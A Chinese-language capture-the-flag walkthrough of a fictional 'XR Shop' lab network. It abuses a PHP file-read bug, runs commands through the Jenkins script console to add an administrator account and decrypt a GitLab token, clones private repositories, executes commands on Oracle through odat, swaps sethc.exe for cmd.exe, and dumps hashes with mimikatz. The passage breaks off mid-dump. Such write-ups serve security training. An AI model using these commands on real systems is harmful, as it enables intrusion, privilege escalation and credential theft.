在这个靶场中，您将扮演一名资深黑客，被雇佣来评估虚构公司 XR Shop 的网络安全。您需要通过渗透测试逐个击破公司暴露在公网的应用，并通过后渗透技巧深入 XR Shop 的内部网络，寻找潜在的弱点和漏洞，并通过滥用 Windows 特权获取管理员权限，最终并获取隐藏在其内部的核心机密。该靶场共有 4 个 Flag，分布于不同的靶机。

第一关

请获取 XR Shop 官网源码的备份文件，并尝试获得系统上任意文件读取的能力。并且，管理员在配置 Jenkins 时，仍然选择了使用初始管理员密码，请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。

fscan起手

E:\小工具\fscan>fscan -h 39.99.134.90
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-25 13:50:29] [INFO] 暴力破解线程数: 1
[2025-04-25 13:50:29] [INFO] 开始信息扫描
[2025-04-25 13:50:29] [INFO] 最终有效主机数量: 1
[2025-04-25 13:50:29] [INFO] 开始主机扫描
[2025-04-25 13:50:29] [INFO] 有效端口数量: 233
[2025-04-25 13:50:29] [SUCCESS] 端口开放 39.99.134.90:110
[2025-04-25 13:50:31] [SUCCESS] 端口开放 39.99.134.90:135
[2025-04-25 13:50:31] [SUCCESS] 端口开放 39.99.134.90:3306
[2025-04-25 13:50:31] [SUCCESS] 端口开放 39.99.134.90:139
[2025-04-25 13:50:31] [SUCCESS] 端口开放 39.99.134.90:445
[2025-04-25 13:50:31] [SUCCESS] 端口开放 39.99.134.90:80
[2025-04-25 13:50:32] [SUCCESS] 服务识别 39.99.134.90:3306 => [mysql] 产品:MySQL 信息:unauthorized Banner:[F.j Host '39.170.26.194' is not allowed to connect to this MySQL server]
[2025-04-25 13:50:33] [SUCCESS] 端口开放 39.99.134.90:8080
[2025-04-25 13:50:33] [SUCCESS] 服务识别 39.99.134.90:110 =>
[2025-04-25 13:50:36] [SUCCESS] 服务识别 39.99.134.90:139 =>  Banner:[.]
[2025-04-25 13:50:38] [SUCCESS] 服务识别 39.99.134.90:445 =>
[2025-04-25 13:50:41] [SUCCESS] 服务识别 39.99.134.90:80 => [http]
[2025-04-25 13:50:45] [SUCCESS] 服务识别 39.99.134.90:8080 => [http]
[2025-04-25 13:51:36] [SUCCESS] 服务识别 39.99.134.90:135 =>
[2025-04-25 13:51:36] [INFO] 存活端口数量: 7
[2025-04-25 13:51:36] [INFO] 开始漏洞扫描
[2025-04-25 13:51:36] [INFO] 加载的插件: findnet, ms17010, mysql, netbios, pop3, smb, smb2, smbghost, webpoc, webtitle
[2025-04-25 13:51:37] [SUCCESS] NetInfo 扫描结果
目标主机: 39.99.134.90
主机名: XR-JENKINS
发现的网络接口:
   IPv4地址:
      └─ 172.22.14.7
[2025-04-25 13:51:37] [SUCCESS] 网站标题 http://39.99.134.90       状态码:200 长度:54646  标题:XR SHOP
[2025-04-25 13:51:37] [SUCCESS] 网站标题 http://39.99.134.90:8080  状态码:403 长度:548    标题:无标题
[2025-04-25 13:51:47] [SUCCESS] 检测到漏洞 http://39.99.134.90:80/www.zip poc-yaml-backup-file 参数:[{path www} {ext zip}]
[2025-04-25 14:13:46] [SUCCESS] 扫描已完成: 12/12

有源码备份下载审计一下

<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file is exist.
if ( file_exists( $logfile ) ) {
  // Get the content and echo it.
  $text = file_get_contents( $logfile );
  echo( $text );
}
exit;

直接读取文件并echo出来了

读取密码

读取flag

第二关

管理员为 Jenkins 配置了 Gitlab，请尝试获取 Gitlab API Token，并最终获取 Gitlab 中的敏感仓库。获取敏感信息后，尝试连接至 Oracle 数据库，并获取 ORACLE 服务器控制权限。

拿到密码登录后台

http://39.99.134.90:8080/manage/script可以执行命令

1	println("whoami".execute().text)

添加用户

1 2	println("net user yiyi qwer1234! /add".execute().text) println("net localgroup administrators yiyi /add".execute().text)

rdp连接

C:\ProgramData\Jenkins.jenkins\credentials.xml找到apjtoken

拿到console中去解密一下

1	println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

得到明文

1	glpat-7kD_qLH2PiQv_ywB9hz2

扫内网扫到gitlab

C:\Users\yiyi\Desktop>fscan.exe -h 172.22.14.7/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-25 14:11:05] [INFO] 暴力破解线程数: 1
[2025-04-25 14:11:05] [INFO] 开始信息扫描
[2025-04-25 14:11:05] [INFO] CIDR范围: 172.22.14.0-172.22.14.255
[2025-04-25 14:11:05] [INFO] 生成IP范围: 172.22.14.0.%!d(string=172.22.14.255) - %!s(MISSING).%!d(MISSING)
[2025-04-25 14:11:05] [INFO] 解析CIDR 172.22.14.7/24 -> IP范围 172.22.14.0-172.22.14.255
[2025-04-25 14:11:05] [INFO] 最终有效主机数量: 256
[2025-04-25 14:11:05] [INFO] 开始主机扫描
[2025-04-25 14:11:05] [SUCCESS] 目标 172.22.14.7     存活 (ICMP)
[2025-04-25 14:11:05] [SUCCESS] 目标 172.22.14.11    存活 (ICMP)
[2025-04-25 14:11:05] [SUCCESS] 目标 172.22.14.16    存活 (ICMP)
[2025-04-25 14:11:05] [SUCCESS] 目标 172.22.14.31    存活 (ICMP)
[2025-04-25 14:11:05] [SUCCESS] 目标 172.22.14.46    存活 (ICMP)
[2025-04-25 14:11:08] [INFO] 存活主机数量: 5
[2025-04-25 14:11:08] [INFO] 有效端口数量: 233
[2025-04-25 14:11:08] [SUCCESS] 端口开放 172.22.14.46:80
[2025-04-25 14:11:08] [SUCCESS] 端口开放 172.22.14.11:88
[2025-04-25 14:11:08] [SUCCESS] 端口开放 172.22.14.7:80
[2025-04-25 14:11:08] [SUCCESS] 端口开放 172.22.14.16:80
[2025-04-25 14:11:08] [SUCCESS] 端口开放 172.22.14.16:22
[2025-04-25 14:11:09] [SUCCESS] 服务识别 172.22.14.16:22 => [ssh] 版本:7.4 产品:OpenSSH 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.4.]
[2025-04-25 14:11:09] [SUCCESS] 端口开放 172.22.14.11:139
[2025-04-25 14:11:09] [SUCCESS] 端口开放 172.22.14.11:389
[2025-04-25 14:11:09] [SUCCESS] 端口开放 172.22.14.46:139
[2025-04-25 14:11:09] [SUCCESS] 端口开放 172.22.14.31:139
[2025-04-25 14:11:09] [SUCCESS] 端口开放 172.22.14.7:139
[2025-04-25 14:11:09] [SUCCESS] 端口开放 172.22.14.46:135
[2025-04-25 14:11:09] [SUCCESS] 端口开放 172.22.14.31:135
[2025-04-25 14:11:09] [SUCCESS] 端口开放 172.22.14.11:135
[2025-04-25 14:11:09] [SUCCESS] 端口开放 172.22.14.7:135
[2025-04-25 14:11:10] [SUCCESS] 端口开放 172.22.14.46:445
[2025-04-25 14:11:10] [SUCCESS] 端口开放 172.22.14.11:445
[2025-04-25 14:11:10] [SUCCESS] 端口开放 172.22.14.31:445
[2025-04-25 14:11:10] [SUCCESS] 端口开放 172.22.14.7:445
[2025-04-25 14:11:12] [SUCCESS] 端口开放 172.22.14.31:1521
[2025-04-25 14:11:13] [SUCCESS] 端口开放 172.22.14.7:3306
[2025-04-25 14:11:13] [SUCCESS] 服务识别 172.22.14.7:3306 => [mysql] 产品:MySQL 信息:unauthorized Banner:[C.j Host 'XR-JENKINS' is not allowed to connect to this MySQL server]
[2025-04-25 14:11:13] [SUCCESS] 服务识别 172.22.14.11:88 =>
[2025-04-25 14:11:14] [SUCCESS] 服务识别 172.22.14.7:80 => [http]
[2025-04-25 14:11:14] [SUCCESS] 服务识别 172.22.14.46:80 => [http]
[2025-04-25 14:11:14] [SUCCESS] 服务识别 172.22.14.16:80 => [http] 产品:nginx
[2025-04-25 14:11:14] [SUCCESS] 服务识别 172.22.14.11:139 =>  Banner:[.]
[2025-04-25 14:11:15] [SUCCESS] 服务识别 172.22.14.46:139 =>  Banner:[.]
[2025-04-25 14:11:15] [SUCCESS] 服务识别 172.22.14.31:139 =>  Banner:[.]
[2025-04-25 14:11:15] [SUCCESS] 服务识别 172.22.14.7:139 =>  Banner:[.]
[2025-04-25 14:11:15] [SUCCESS] 服务识别 172.22.14.46:445 =>
[2025-04-25 14:11:15] [SUCCESS] 服务识别 172.22.14.11:445 =>
[2025-04-25 14:11:16] [SUCCESS] 服务识别 172.22.14.31:445 =>
[2025-04-25 14:11:16] [SUCCESS] 服务识别 172.22.14.7:445 =>
[2025-04-25 14:11:17] [SUCCESS] 服务识别 172.22.14.31:1521 =>
[2025-04-25 14:11:19] [SUCCESS] 端口开放 172.22.14.7:8080
[2025-04-25 14:11:19] [SUCCESS] 端口开放 172.22.14.16:8060
[2025-04-25 14:11:20] [SUCCESS] 服务识别 172.22.14.11:389 =>
[2025-04-25 14:11:24] [SUCCESS] 服务识别 172.22.14.7:8080 => [http]
[2025-04-25 14:11:26] [SUCCESS] 端口开放 172.22.14.16:9094
[2025-04-25 14:11:29] [SUCCESS] 服务识别 172.22.14.16:8060 => [http] 版本:1.20.2 产品:nginx
[2025-04-25 14:11:31] [SUCCESS] 服务识别 172.22.14.16:9094 =>
[2025-04-25 14:12:15] [SUCCESS] 服务识别 172.22.14.46:135 =>
[2025-04-25 14:12:15] [SUCCESS] 服务识别 172.22.14.31:135 =>
[2025-04-25 14:12:15] [SUCCESS] 服务识别 172.22.14.11:135 =>
[2025-04-25 14:12:15] [SUCCESS] 服务识别 172.22.14.7:135 =>
[2025-04-25 14:12:15] [INFO] 存活端口数量: 23
[2025-04-25 14:12:15] [INFO] 开始漏洞扫描
[2025-04-25 14:12:15] [INFO] 加载的插件: findnet, ldap, ms17010, mysql, netbios, oracle, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-25 14:12:15] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.7
主机名: XR-JENKINS
发现的网络接口:
   IPv4地址:
      └─ 172.22.14.7
[2025-04-25 14:12:16] [SUCCESS] 网站标题 http://172.22.14.16       状态码:302 长度:99     标题:无标题 重定向地址: http://172.22.14.16/users/sign_in
[2025-04-25 14:12:16] [SUCCESS] 网站标题 http://172.22.14.46       状态码:200 长度:703    标题:IIS Windows Server
[2025-04-25 14:12:16] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.46
主机名: XR-0923
发现的网络接口:
   IPv4地址:
      └─ 172.22.14.46
[2025-04-25 14:12:16] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.11
主机名: XR-DC
发现的网络接口:
   IPv4地址:
      └─ 172.22.14.11
[2025-04-25 14:12:16] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.14.31
主机名: XR-ORACLE
发现的网络接口:
   IPv4地址:
      └─ 172.22.14.31
[2025-04-25 14:12:16] [SUCCESS] 网站标题 http://172.22.14.7        状态码:200 长度:54603  标题:XR SHOP
[2025-04-25 14:12:16] [SUCCESS] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE
[2025-04-25 14:12:16] [SUCCESS] NetBios 172.22.14.46    XIAORANG\XR-0923
[2025-04-25 14:12:16] [SUCCESS] NetBios 172.22.14.11    DC:XIAORANG\XR-DC
[2025-04-25 14:12:17] [SUCCESS] 网站标题 http://172.22.14.16:8060  状态码:404 长度:555    标题:404 Not Found
[2025-04-25 14:12:17] [SUCCESS] 网站标题 http://172.22.14.7:8080   状态码:403 长度:548    标题:无标题
[2025-04-25 14:12:20] [SUCCESS] 检测到漏洞 http://172.22.14.7:80/www.zip poc-yaml-backup-file 参数:[{path www} {ext zip}]
[2025-04-25 14:12:44] [SUCCESS] 网站标题 http://172.22.14.16/users/sign_in 状态码:200 长度:34961  标题:Sign in · GitLab
[2025-04-25 14:34:25] [SUCCESS] 扫描已完成: 42/42

拿token去

1
2

C:\Users\31702\Downloads>curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
[{"id":6,"description":null,"name":"Internal Secret","name_with_namespace":"XRLAB / Internal Secret","path":"internal-secret","path_with_namespace":"xrlab/internal-secret","created_at":"2022-12-25T08:30:12.362Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/internal-secret.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/internal-secret.git","web_url":"http://gitlab.xiaorang.lab/xrlab/internal-secret","readme_url":null,"avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T08:30:12.362Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/6","issues":"http://gitlab.xiaorang.lab/api/v4/projects/6/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/6/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/6/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/6/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T08:30:12.373Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":null,"import_status":"none","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":null,"group_access":{"access_level":50,"notification_level":3}}},{"id":4,"description":null,"name":"XRAdmin","name_with_namespace":"XRLAB / XRAdmin","path":"xradmin","path_with_namespace":"xrlab/xradmin","created_at":"2022-12-25T07:48:16.751Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/xradmin.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/xradmin.git","web_url":"http://gitlab.xiaorang.lab/xrlab/xradmin","readme_url":"http://gitlcurl: (56) Recv failure: Connection was reset

下载下来

C:\Users\31702\Downloads>git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
Cloning into 'internal-secret'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (6/6), 6.48 KiB | 6.48 MiB/s, done.

C:\Users\31702\Downloads>git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
Cloning into 'xradmin'...
remote: Enumerating objects: 869, done.
remote: Counting objects: 100% (869/869), done.
remote: Compressing objects: 100% (636/636), done.
remote: Total 869 (delta 155), reused 854 (delta 150), pack-reused 0
Receiving objects: 100% (869/869), 3.44 MiB | 295.00 KiB/s, done.
Resolving deltas: 100% (155/155), done.

C:\Users\31702\Downloads>git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
Cloning into 'xrwiki'...
remote: Enumerating objects: 6, done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 6
Receiving objects: 100% (6/6), done.

C:\Users\31702\Downloads>git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git
Cloning into 'awenode'...
remote: Enumerating objects: 24, done.
remote: Total 24 (delta 0), reused 0 (delta 0), pack-reused 24
Receiving objects: 100% (24/24), 15.09 KiB | 498.00 KiB/s, done.
Resolving deltas: 100% (1/1), done.

username: xradmin

password: fcMyE8t9E4XdsKf

直接使用odat

1
2

proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user yiyi qwer1234! /add'
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators yiyi /add'

拿到flag2

第三关

攻击办公区内网，获取办公 PC 控制权限，并通过特权滥用提升至 SYSTEM 权限。

internal-secret中拿到一堆账密对应扫出来的0923的主机

1	XR-0923 \| zhangshuai \| wSbEajHzZs

C:\Users\zhangshuai>whoami /priv

特权信息
----------------------

特权名                        描述           状态
============================= ============== ======
SeChangeNotifyPrivilege       绕过遍历检查   已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用

C:\Users\zhangshuai>net user zhangshuai
用户名                 zhangshuai
全名
注释
用户的注释
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2022/12/26 10:33:13
密码到期               从不
密码可更改             2022/12/27 10:33:13
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本
用户配置文件
主目录
上次登录               2025/4/25 14:59:46

可允许的登录小时数     All

本地组成员             *Remote Desktop Users *Remote Management Use
                       *Users
全局组成员             *None
命令成功完成。


C:\Users\zhangshuai>

发现可以远程登录

1	proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

┌──(root㉿kali)-[~]
└─# proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.46:5985  ...  OK
*Evil-WinRM* PS C:\Users\zhangshuai\Documents> whoami
xr-0923\zhangshuai
*Evil-WinRM* PS C:\Users\zhangshuai\Documents> whoami /priv
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.46:5985  ...  OK
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.46:5985  ...  OK

特权信息
----------------------

特权名                        描述           状态
============================= ============== ======
SeRestorePrivilege            还原文件和目录 已启用
SeChangeNotifyPrivilege       绕过遍历检查   已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用
*Evil-WinRM* PS C:\Users\zhangshuai\Documents>

因为有SeRestorePrivilege，所以能无视ACL修改文件或者编辑注册表，类似于之前的放大镜提权，我们可以把cmd.exe重命名为sethc.exe，然后在锁屏界面连按五次shift启动sethc提权

*Evil-WinRM* PS C:\Users\zhangshuai\Documents> cd C:\
*Evil-WinRM* PS C:\> cd windows/system32
*Evil-WinRM* PS C:\windows\system32> ren sethc.exe sethc.bak
*Evil-WinRM* PS C:\windows\system32> ren cmd.exe sethc.exe
*Evil-WinRM* PS C:\windows\system32>

ctrl+fn+alt+键盘右键锁屏然后读flag，并且创建一个新用户

创建个administrator用户进入

第四关

尝试接管备份管理操作员帐户，并通过转储 NTDS 获得域管理员权限，最终控制整个域环境。

抓取密码


  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 8695770 (00000000:0084afda)
Session           : Interactive from 4
User Name         : UMFD-4
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/4/25 15:14:28
SID               : S-1-5-96-0-4
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 8386208 (00000000:007ff6a0)
Session           : RemoteInteractive from 3
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/4/25 15:13:49
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 8372089 (00000000:007fbf79)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/25 15:13:49
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 8371569 (00000000:007fbd71)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/25 15:13:49
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 8370989 (00000000:007fbb2d)
Session           : Interactive from 3
User Name         : UMFD-3
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/4/25 15:13:49
SID               : S-1-5-96-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
